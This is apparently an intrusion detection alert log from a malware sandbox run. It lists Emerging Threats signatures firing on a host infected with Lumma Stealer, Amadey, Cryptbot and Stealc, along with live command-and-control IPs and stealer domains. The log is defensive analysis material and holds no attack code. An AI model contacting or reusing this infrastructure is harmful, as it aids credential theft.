2024-12-19T10:12:31.759587+0100	2028371	3	Unknown Traffic	192.168.2.6	50192	172.67.179.109	443	TCP
2024-12-19T10:12:38.610750+0100	2028371	3	Unknown Traffic	192.168.2.6	50197	104.21.12.88	443	TCP
2024-12-19T10:12:39.435882+0100	2028371	3	Unknown Traffic	192.168.2.6	50205	172.67.179.109	443	TCP
2024-12-19T10:12:40.344470+0100	2028371	3	Unknown Traffic	192.168.2.6	50207	172.67.177.88	443	TCP
2024-12-19T10:12:46.863780+0100	2028371	3	Unknown Traffic	192.168.2.6	50213	172.67.179.109	443	TCP
2024-12-19T10:12:47.189997+0100	2028371	3	Unknown Traffic	192.168.2.6	50214	172.67.179.109	443	TCP
2024-12-19T10:12:54.015556+0100	2028371	3	Unknown Traffic	192.168.2.6	50251	104.21.12.88	443	TCP
2024-12-19T10:12:56.129651+0100	2028371	3	Unknown Traffic	192.168.2.6	50256	172.67.177.88	443	TCP
2024-12-19T10:12:57.565636+0100	2028371	3	Unknown Traffic	192.168.2.6	50260	172.67.179.109	443	TCP
2024-12-19T10:13:02.456815+0100	2028371	3	Unknown Traffic	192.168.2.6	50262	172.67.179.109	443	TCP
2024-12-19T10:13:10.937102+0100	2028371	3	Unknown Traffic	192.168.2.6	50267	172.67.177.88	443	TCP
2024-12-19T10:13:10.947593+0100	2028371	3	Unknown Traffic	192.168.2.6	50268	104.21.66.85	443	TCP
2024-12-19T10:13:12.639342+0100	2028371	3	Unknown Traffic	192.168.2.6	50269	172.67.179.109	443	TCP
2024-12-19T10:13:16.609402+0100	2028371	3	Unknown Traffic	192.168.2.6	50272	172.67.179.109	443	TCP
2024-12-19T10:13:20.070952+0100	2028371	3	Unknown Traffic	192.168.2.6	50274	172.67.179.109	443	TCP
2024-12-19T10:13:26.410957+0100	2028371	3	Unknown Traffic	192.168.2.6	50307	104.21.66.85	443	TCP
2024-12-19T10:13:26.837375+0100	2028371	3	Unknown Traffic	192.168.2.6	50309	172.67.177.88	443	TCP
2024-12-19T10:13:28.493227+0100	2028371	3	Unknown Traffic	192.168.2.6	50313	172.67.179.109	443	TCP
2024-12-19T10:13:33.740139+0100	2028371	3	Unknown Traffic	192.168.2.6	50317	172.67.179.109	443	TCP
2024-12-19T10:13:33.937186+0100	2028371	3	Unknown Traffic	192.168.2.6	50318	172.67.179.109	443	TCP
2024-12-19T10:13:40.190940+0100	2028371	3	Unknown Traffic	192.168.2.6	50321	104.21.66.85	443	TCP
2024-12-19T10:13:43.011144+0100	2028371	3	Unknown Traffic	192.168.2.6	50324	172.67.177.88	443	TCP
2024-12-19T10:13:43.105173+0100	2028371	3	Unknown Traffic	192.168.2.6	50325	172.67.179.109	443	TCP
2024-12-19T10:13:48.009285+0100	2028371	3	Unknown Traffic	192.168.2.6	50328	172.67.179.109	443	TCP
2024-12-19T10:13:56.888741+0100	2028371	3	Unknown Traffic	192.168.2.6	50349	104.21.66.85	443	TCP
2024-12-19T10:13:56.934754+0100	2028371	3	Unknown Traffic	192.168.2.6	50350	104.21.23.76	443	TCP
2024-12-19T10:14:04.571209+0100	2028371	3	Unknown Traffic	192.168.2.6	50372	172.67.179.109	443	TCP
2024-12-19T10:14:04.577871+0100	2028371	3	Unknown Traffic	192.168.2.6	50371	172.67.179.109	443	TCP
2024-12-19T10:14:11.997042+0100	2028371	3	Unknown Traffic	192.168.2.6	50375	104.21.23.76	443	TCP
2024-12-19T10:14:13.870845+0100	2028371	3	Unknown Traffic	192.168.2.6	50379	104.21.66.85	443	TCP
2024-12-19T10:14:20.351671+0100	2028371	3	Unknown Traffic	192.168.2.6	50381	172.67.179.109	443	TCP
2024-12-19T10:14:21.379841+0100	2028371	3	Unknown Traffic	192.168.2.6	50383	172.67.179.109	443	TCP
2024-12-19T10:14:28.135032+0100	2028371	3	Unknown Traffic	192.168.2.6	50386	104.21.23.76	443	TCP
2024-12-19T10:14:30.048551+0100	2028371	3	Unknown Traffic	192.168.2.6	50387	104.21.66.85	443	TCP
2024-12-19T10:14:36.163512+0100	2028371	3	Unknown Traffic	192.168.2.6	50391	172.67.179.109	443	TCP
2024-12-19T10:14:37.266248+0100	2028371	3	Unknown Traffic	192.168.2.6	50393	172.67.179.109	443	TCP
2024-12-19T10:14:43.258744+0100	2028371	3	Unknown Traffic	192.168.2.6	50395	104.21.23.76	443	TCP
2024-12-19T10:14:43.261752+0100	2028371	3	Unknown Traffic	192.168.2.6	50396	172.67.180.113	443	TCP
2024-12-19T10:14:51.859002+0100	2028371	3	Unknown Traffic	192.168.2.6	50400	172.67.179.109	443	TCP
2024-12-19T10:14:58.539015+0100	2028371	3	Unknown Traffic	192.168.2.6	50412	172.67.180.113	443	TCP
2024-12-19T10:14:58.790504+0100	2028371	3	Unknown Traffic	192.168.2.6	50413	104.21.23.76	443	TCP
2024-12-19T10:15:07.140066+0100	2028371	3	Unknown Traffic	192.168.2.6	50418	172.67.179.109	443	TCP
2024-12-19T10:15:13.487606+0100	2028371	3	Unknown Traffic	192.168.2.6	50421	172.67.180.113	443	TCP
2024-12-19T10:15:15.434443+0100	2028371	3	Unknown Traffic	192.168.2.6	50422	104.21.23.76	443	TCP
2024-12-19T10:15:23.230861+0100	2028371	3	Unknown Traffic	192.168.2.6	50427	104.21.64.80	443	TCP
2024-12-19T10:15:29.076004+0100	2028371	3	Unknown Traffic	192.168.2.6	50430	172.67.180.113	443	TCP
2024-12-19T10:15:29.080104+0100	2028371	3	Unknown Traffic	192.168.2.6	50431	104.21.64.80	443	TCP
2024-12-19T10:15:44.147166+0100	2028371	3	Unknown Traffic	192.168.2.6	50438	172.67.180.113	443	TCP
2024-12-19T10:15:44.281141+0100	2028371	3	Unknown Traffic	192.168.2.6	50439	104.21.64.80	443	TCP
2024-12-19T10:15:58.868875+0100	2028371	3	Unknown Traffic	192.168.2.6	50447	172.67.180.113	443	TCP
2024-12-19T10:15:58.888579+0100	2028371	3	Unknown Traffic	192.168.2.6	50448	104.21.64.80	443	TCP
2024-12-19T10:16:14.095435+0100	2028371	3	Unknown Traffic	192.168.2.6	50453	104.21.64.80	443	TCP
2024-12-19T10:16:28.946075+0100	2028371	3	Unknown Traffic	192.168.2.6	50459	104.21.64.80	443	TCP
2024-12-19T10:16:44.298005+0100	2028371	3	Unknown Traffic	192.168.2.6	50466	104.21.64.80	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T10:10:30.113211+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49878	172.67.179.109	443	TCP
2024-12-19T10:10:42.656274+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49908	172.67.179.109	443	TCP
2024-12-19T10:10:55.232414+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49946	172.67.179.109	443	TCP
2024-12-19T10:11:11.092642+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50020	172.67.179.109	443	TCP
2024-12-19T10:11:20.346594+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50047	104.21.12.88	443	TCP
2024-12-19T10:11:27.748630+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50078	172.67.177.88	443	TCP
2024-12-19T10:11:35.043329+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50086	104.21.12.88	443	TCP
2024-12-19T10:11:39.954035+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50090	172.67.177.88	443	TCP
2024-12-19T10:12:06.284996+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50140	172.67.179.109	443	TCP
2024-12-19T10:12:12.706709+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50144	104.21.66.85	443	TCP
2024-12-19T10:12:16.881178+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50148	104.21.23.76	443	TCP
2024-12-19T10:12:20.443136+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50161	172.67.179.109	443	TCP
2024-12-19T10:12:23.114352+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50160	172.67.180.113	443	TCP
2024-12-19T10:12:27.251497+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50178	104.21.66.85	443	TCP
2024-12-19T10:12:31.624950+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50181	104.21.23.76	443	TCP
2024-12-19T10:12:39.840166+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50188	172.67.180.113	443	TCP
2024-12-19T10:12:45.847852+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50191	172.67.179.109	443	TCP
2024-12-19T10:12:47.058442+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50192	172.67.179.109	443	TCP
2024-12-19T10:13:01.021706+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50214	172.67.179.109	443	TCP
2024-12-19T10:13:01.233322+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50213	172.67.179.109	443	TCP
2024-12-19T10:13:08.835560+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50251	104.21.12.88	443	TCP
2024-12-19T10:13:15.015147+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50262	172.67.179.109	443	TCP
2024-12-19T10:13:32.716779+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50274	172.67.179.109	443	TCP
2024-12-19T10:13:47.897086+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50318	172.67.179.109	443	TCP
2024-12-19T10:13:56.214531+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50325	172.67.179.109	443	TCP
2024-12-19T10:13:57.746917+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50324	172.67.177.88	443	TCP
2024-12-19T10:14:43.749443+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50387	104.21.66.85	443	TCP
2024-12-19T10:14:51.949375+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50393	172.67.179.109	443	TCP
2024-12-19T10:15:29.548726+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50422	104.21.23.76	443	TCP
2024-12-19T10:15:36.831185+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50427	104.21.64.80	443	TCP
2024-12-19T10:16:13.844665+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50447	172.67.180.113	443	TCP
2024-12-19T10:16:58.489466+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50466	104.21.64.80	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T10:10:30.113211+0100	2049836	1	A Network Trojan was detected	192.168.2.6	49878	172.67.179.109	443	TCP
2024-12-19T10:10:42.656274+0100	2049836	1	A Network Trojan was detected	192.168.2.6	49908	172.67.179.109	443	TCP
2024-12-19T10:10:55.232414+0100	2049836	1	A Network Trojan was detected	192.168.2.6	49946	172.67.179.109	443	TCP
2024-12-19T10:11:20.346594+0100	2049836	1	A Network Trojan was detected	192.168.2.6	50047	104.21.12.88	443	TCP
2024-12-19T10:11:27.748630+0100	2049836	1	A Network Trojan was detected	192.168.2.6	50078	172.67.177.88	443	TCP
2024-12-19T10:12:06.284996+0100	2049836	1	A Network Trojan was detected	192.168.2.6	50140	172.67.179.109	443	TCP
2024-12-19T10:12:12.706709+0100	2049836	1	A Network Trojan was detected	192.168.2.6	50144	104.21.66.85	443	TCP
2024-12-19T10:12:16.881178+0100	2049836	1	A Network Trojan was detected	192.168.2.6	50148	104.21.23.76	443	TCP
2024-12-19T10:12:23.114352+0100	2049836	1	A Network Trojan was detected	192.168.2.6	50160	172.67.180.113	443	TCP
2024-12-19T10:12:45.847852+0100	2049836	1	A Network Trojan was detected	192.168.2.6	50191	172.67.179.109	443	TCP
2024-12-19T10:13:01.233322+0100	2049836	1	A Network Trojan was detected	192.168.2.6	50213	172.67.179.109	443	TCP
2024-12-19T10:13:32.716779+0100	2049836	1	A Network Trojan was detected	192.168.2.6	50274	172.67.179.109	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T10:11:11.092642+0100	2049812	1	A Network Trojan was detected	192.168.2.6	50020	172.67.179.109	443	TCP
2024-12-19T10:11:35.043329+0100	2049812	1	A Network Trojan was detected	192.168.2.6	50086	104.21.12.88	443	TCP
2024-12-19T10:11:39.954035+0100	2049812	1	A Network Trojan was detected	192.168.2.6	50090	172.67.177.88	443	TCP
2024-12-19T10:12:20.443136+0100	2049812	1	A Network Trojan was detected	192.168.2.6	50161	172.67.179.109	443	TCP
2024-12-19T10:12:27.251497+0100	2049812	1	A Network Trojan was detected	192.168.2.6	50178	104.21.66.85	443	TCP
2024-12-19T10:12:31.624950+0100	2049812	1	A Network Trojan was detected	192.168.2.6	50181	104.21.23.76	443	TCP
2024-12-19T10:12:39.840166+0100	2049812	1	A Network Trojan was detected	192.168.2.6	50188	172.67.180.113	443	TCP
2024-12-19T10:13:01.021706+0100	2049812	1	A Network Trojan was detected	192.168.2.6	50214	172.67.179.109	443	TCP
2024-12-19T10:13:15.015147+0100	2049812	1	A Network Trojan was detected	192.168.2.6	50262	172.67.179.109	443	TCP
2024-12-19T10:13:47.897086+0100	2049812	1	A Network Trojan was detected	192.168.2.6	50318	172.67.179.109	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T10:11:58.406650+0100	2058355	1	Domain Observed Used for C2 Detected	192.168.2.6	50144	104.21.66.85	443	TCP
2024-12-19T10:12:13.936958+0100	2058355	1	Domain Observed Used for C2 Detected	192.168.2.6	50178	104.21.66.85	443	TCP
2024-12-19T10:13:10.947593+0100	2058355	1	Domain Observed Used for C2 Detected	192.168.2.6	50268	104.21.66.85	443	TCP
2024-12-19T10:13:26.410957+0100	2058355	1	Domain Observed Used for C2 Detected	192.168.2.6	50307	104.21.66.85	443	TCP
2024-12-19T10:13:40.190940+0100	2058355	1	Domain Observed Used for C2 Detected	192.168.2.6	50321	104.21.66.85	443	TCP
2024-12-19T10:13:56.888741+0100	2058355	1	Domain Observed Used for C2 Detected	192.168.2.6	50349	104.21.66.85	443	TCP
2024-12-19T10:14:13.870845+0100	2058355	1	Domain Observed Used for C2 Detected	192.168.2.6	50379	104.21.66.85	443	TCP
2024-12-19T10:14:30.048551+0100	2058355	1	Domain Observed Used for C2 Detected	192.168.2.6	50387	104.21.66.85	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T10:10:17.268735+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	49878	172.67.179.109	443	TCP
2024-12-19T10:10:28.725832+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	49908	172.67.179.109	443	TCP
2024-12-19T10:10:31.039680+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	49916	172.67.179.109	443	TCP
2024-12-19T10:10:39.816734+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	49946	172.67.179.109	443	TCP
2024-12-19T10:10:43.385002+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	49967	172.67.179.109	443	TCP
2024-12-19T10:10:56.497408+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50020	172.67.179.109	443	TCP
2024-12-19T10:11:13.085283+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50072	172.67.179.109	443	TCP
2024-12-19T10:11:32.043863+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50094	172.67.179.109	443	TCP
2024-12-19T10:11:41.000375+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50117	172.67.179.109	443	TCP
2024-12-19T10:11:54.286496+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50140	172.67.179.109	443	TCP
2024-12-19T10:11:56.589036+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50142	172.67.179.109	443	TCP
2024-12-19T10:12:07.516092+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50161	172.67.179.109	443	TCP
2024-12-19T10:12:15.070181+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50180	172.67.179.109	443	TCP
2024-12-19T10:12:22.627875+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50186	172.67.179.109	443	TCP
2024-12-19T10:12:30.996555+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50191	172.67.179.109	443	TCP
2024-12-19T10:12:31.759587+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50192	172.67.179.109	443	TCP
2024-12-19T10:12:39.435882+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50205	172.67.179.109	443	TCP
2024-12-19T10:12:46.863780+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50213	172.67.179.109	443	TCP
2024-12-19T10:12:47.189997+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50214	172.67.179.109	443	TCP
2024-12-19T10:12:57.565636+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50260	172.67.179.109	443	TCP
2024-12-19T10:13:02.456815+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50262	172.67.179.109	443	TCP
2024-12-19T10:13:12.639342+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50269	172.67.179.109	443	TCP
2024-12-19T10:13:16.609402+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50272	172.67.179.109	443	TCP
2024-12-19T10:13:20.070952+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50274	172.67.179.109	443	TCP
2024-12-19T10:13:28.493227+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50313	172.67.179.109	443	TCP
2024-12-19T10:13:33.740139+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50317	172.67.179.109	443	TCP
2024-12-19T10:13:33.937186+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50318	172.67.179.109	443	TCP
2024-12-19T10:13:43.105173+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50325	172.67.179.109	443	TCP
2024-12-19T10:13:48.009285+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50328	172.67.179.109	443	TCP
2024-12-19T10:14:04.571209+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50372	172.67.179.109	443	TCP
2024-12-19T10:14:04.577871+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50371	172.67.179.109	443	TCP
2024-12-19T10:14:20.351671+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50381	172.67.179.109	443	TCP
2024-12-19T10:14:21.379841+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50383	172.67.179.109	443	TCP
2024-12-19T10:14:36.163512+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50391	172.67.179.109	443	TCP
2024-12-19T10:14:37.266248+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50393	172.67.179.109	443	TCP
2024-12-19T10:14:51.859002+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50400	172.67.179.109	443	TCP
2024-12-19T10:15:07.140066+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50418	172.67.179.109	443	TCP
2024-12-19T10:15:23.230861+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50427	104.21.64.80	443	TCP
2024-12-19T10:15:29.080104+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50431	104.21.64.80	443	TCP
2024-12-19T10:15:44.281141+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50439	104.21.64.80	443	TCP
2024-12-19T10:15:58.888579+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50448	104.21.64.80	443	TCP
2024-12-19T10:16:14.095435+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50453	104.21.64.80	443	TCP
2024-12-19T10:16:28.946075+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50459	104.21.64.80	443	TCP
2024-12-19T10:16:44.298005+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.6	50466	104.21.64.80	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T10:12:01.140413+0100	2058398	1	Domain Observed Used for C2 Detected	192.168.2.6	50148	104.21.23.76	443	TCP
2024-12-19T10:12:18.133008+0100	2058398	1	Domain Observed Used for C2 Detected	192.168.2.6	50181	104.21.23.76	443	TCP
2024-12-19T10:13:56.934754+0100	2058398	1	Domain Observed Used for C2 Detected	192.168.2.6	50350	104.21.23.76	443	TCP
2024-12-19T10:14:11.997042+0100	2058398	1	Domain Observed Used for C2 Detected	192.168.2.6	50375	104.21.23.76	443	TCP
2024-12-19T10:14:28.135032+0100	2058398	1	Domain Observed Used for C2 Detected	192.168.2.6	50386	104.21.23.76	443	TCP
2024-12-19T10:14:43.258744+0100	2058398	1	Domain Observed Used for C2 Detected	192.168.2.6	50395	104.21.23.76	443	TCP
2024-12-19T10:14:58.790504+0100	2058398	1	Domain Observed Used for C2 Detected	192.168.2.6	50413	104.21.23.76	443	TCP
2024-12-19T10:15:15.434443+0100	2058398	1	Domain Observed Used for C2 Detected	192.168.2.6	50422	104.21.23.76	443	TCP

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T10:12:48.924632+0100	2019714	2	Potentially Bad Traffic	192.168.2.6	50216	185.215.113.16	80	TCP
2024-12-19T10:14:53.414485+0100	2019714	2	Potentially Bad Traffic	192.168.2.6	50401	185.215.113.16	80	TCP
2024-12-19T10:15:38.296391+0100	2019714	2	Potentially Bad Traffic	192.168.2.6	50435	185.215.113.16	80	TCP
2024-12-19T10:16:59.958213+0100	2019714	2	Potentially Bad Traffic	192.168.2.6	50478	185.215.113.16	80	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T10:10:17.559293+0100	2044696	1	A Network Trojan was detected	192.168.2.6	49879	185.215.113.43	80	TCP
2024-12-19T10:10:28.371820+0100	2044696	1	A Network Trojan was detected	192.168.2.6	49904	185.215.113.43	80	TCP
2024-12-19T10:10:35.434733+0100	2044696	1	A Network Trojan was detected	192.168.2.6	49927	185.215.113.43	80	TCP
2024-12-19T10:10:43.661614+0100	2044696	1	A Network Trojan was detected	192.168.2.6	49964	185.215.113.43	80	TCP
2024-12-19T10:10:56.122031+0100	2044696	1	A Network Trojan was detected	192.168.2.6	50019	185.215.113.43	80	TCP
2024-12-19T10:11:07.253746+0100	2044696	1	A Network Trojan was detected	192.168.2.6	50048	185.215.113.43	80	TCP
2024-12-19T10:11:15.787829+0100	2044696	1	A Network Trojan was detected	192.168.2.6	50083	185.215.113.43	80	TCP
2024-12-19T10:11:28.702130+0100	2044696	1	A Network Trojan was detected	192.168.2.6	50089	185.215.113.43	80	TCP
2024-12-19T10:11:36.027617+0100	2044696	1	A Network Trojan was detected	192.168.2.6	50098	185.215.113.43	80	TCP
2024-12-19T10:11:46.414587+0100	2044696	1	A Network Trojan was detected	192.168.2.6	50133	185.215.113.43	80	TCP
2024-12-19T10:11:53.121838+0100	2044696	1	A Network Trojan was detected	192.168.2.6	50138	185.215.113.43	80	TCP
2024-12-19T10:11:59.844297+0100	2044696	1	A Network Trojan was detected	192.168.2.6	50145	185.215.113.43	80	TCP
2024-12-19T10:12:08.286214+0100	2044696	1	A Network Trojan was detected	192.168.2.6	50162	185.215.113.43	80	TCP
2024-12-19T10:12:21.232056+0100	2044696	1	A Network Trojan was detected	192.168.2.6	50183	185.215.113.43	80	TCP
2024-12-19T10:12:32.728602+0100	2044696	1	A Network Trojan was detected	192.168.2.6	50193	185.215.113.43	80	TCP
2024-12-19T10:12:38.265211+0100	2044696	1	A Network Trojan was detected	192.168.2.6	50196	185.215.113.43	80	TCP
2024-12-19T10:12:43.378261+0100	2044696	1	A Network Trojan was detected	192.168.2.6	50211	185.215.113.43	80	TCP
2024-12-19T10:12:48.569654+0100	2044696	1	A Network Trojan was detected	192.168.2.6	50215	185.215.113.43	80	TCP

ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T10:12:00.786229+0100	2054350	1	A Network Trojan was detected	192.168.2.6	50146	176.53.146.212	80	TCP
2024-12-19T10:12:02.435710+0100	2054350	1	A Network Trojan was detected	192.168.2.6	50151	176.53.146.212	80	TCP
2024-12-19T10:12:11.679833+0100	2054350	1	A Network Trojan was detected	192.168.2.6	50176	176.53.146.212	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T10:11:56.759766+0100	2058354	1	Domain Observed Used for C2 Detected	192.168.2.6	65374	1.1.1.1	53	UDP
2024-12-19T10:11:57.025176+0100	2058354	1	Domain Observed Used for C2 Detected	192.168.2.6	65374	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T10:10:15.717440+0100	2058364	1	Domain Observed Used for C2 Detected	192.168.2.6	56657	1.1.1.1	53	UDP
2024-12-19T10:15:21.869256+0100	2058364	1	Domain Observed Used for C2 Detected	192.168.2.6	49157	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pancakedipyps .click)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T10:11:59.574844+0100	2058397	1	Domain Observed Used for C2 Detected	192.168.2.6	54398	1.1.1.1	53	UDP
2024-12-19T10:11:59.825624+0100	2058397	1	Domain Observed Used for C2 Detected	192.168.2.6	54398	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T10:10:15.071739+0100	2058378	1	Domain Observed Used for C2 Detected	192.168.2.6	60512	1.1.1.1	53	UDP
2024-12-19T10:10:27.363784+0100	2058378	1	Domain Observed Used for C2 Detected	192.168.2.6	49206	1.1.1.1	53	UDP
2024-12-19T10:10:38.449139+0100	2058378	1	Domain Observed Used for C2 Detected	192.168.2.6	57553	1.1.1.1	53	UDP
2024-12-19T10:11:52.923263+0100	2058378	1	Domain Observed Used for C2 Detected	192.168.2.6	53506	1.1.1.1	53	UDP
2024-12-19T10:12:29.617496+0100	2058378	1	Domain Observed Used for C2 Detected	192.168.2.6	51044	1.1.1.1	53	UDP
2024-12-19T10:12:45.496389+0100	2058378	1	Domain Observed Used for C2 Detected	192.168.2.6	54382	1.1.1.1	53	UDP
2024-12-19T10:13:18.698257+0100	2058378	1	Domain Observed Used for C2 Detected	192.168.2.6	57132	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T10:10:30.680060+0100	2044245	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.6	49909	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T10:10:30.558472+0100	2044244	1	Malware Command and Control Activity Detected	192.168.2.6	49909	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T10:10:31.004096+0100	2044246	1	Malware Command and Control Activity Detected	192.168.2.6	49909	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T10:10:33.298990+0100	2044248	1	Malware Command and Control Activity Detected	192.168.2.6	49909	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T10:10:31.136376+0100	2044247	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.6	49909	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T10:11:38.289026+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	50094	172.67.179.109	443	TCP
2024-12-19T10:11:47.594214+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	50097	104.21.12.88	443	TCP
2024-12-19T10:12:12.952158+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	50142	172.67.179.109	443	TCP
2024-12-19T10:12:37.033137+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	50184	104.21.12.88	443	TCP
